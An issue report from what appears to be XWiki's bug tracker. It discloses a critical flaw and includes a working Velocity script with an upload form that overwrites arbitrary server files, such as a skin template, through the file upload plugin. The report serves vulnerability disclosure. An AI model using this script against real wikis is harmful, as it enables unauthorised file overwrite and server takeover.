Details
-
Bug
-
Resolution: Fixed
-
Critical
-
2.3
-
*nix (for winx just switch the slashes.)
-
Low
-
Medium
-
N/A
-
N/A
-
Awaiting Committer feedback
-
Description
This sample exploit abuses the file upload plugin but I reported this as a core bug because the problem is not constrained to the file upload plugin and I suspect I can find at least a half dozen other places where it manifests.
The root of the problem is that the File class is too widely available and thus too much code is relied upon to keep the filesystem safe.
The goods:
{{velocity}}
#if($request.getContentType().startsWith('multipart/'))
#foreach($file in $xwiki.get('fileupload').getFileItems())
#set($f = $file.getStoreLocation())
#set($fi = $file)
#end
#set($f = $f.getAbsoluteFile())
#foreach($part in $f.getCanonicalPath().split('/'))
#set($path = $f.getParentFile())
#end
#set($newf = $f.getParentFile().getParentFile())
#foreach($part in $request.getParameter('filename').split('/'))
#if($part != '')
#if($use != '')
#set($use = '')
#foreach($subf in $newf.listFiles())
#if($subf.getName() == $part)
#set($use = $subf)
#end
#end
#if($use != '')
#set($newf = $use)
#end
#else
Couldn't find the dir/file to write to ($part)
#set($failed = 1)
#end
#end
#end
#if(!$failed && $newf.delete() && $fi.write($newf))
== **Win!** ==
#end
#end
{{html clean=false}}
<form action="$doc.getURL("view")" enctype="multipart/form-data" method="post">
<dl><dt>Where to save:</dt><dd>
<input type="text" name="filename" value="/usr/local/jetty-6.1.3/webapps/xwikiTrunk/skins/colibri/view.vm" size="80"/></dd>
<dt>What to save:</dt><dd>
<dd><input type="file" name="filepath" value="" size="40"/></dd>
</dl>
<input type="submit" value="Save!" class="button"/>
</form>{{/html}}
{{/velocity}}
Attachments
Issue Links
- is related to
-
-
- Closed
-
- links to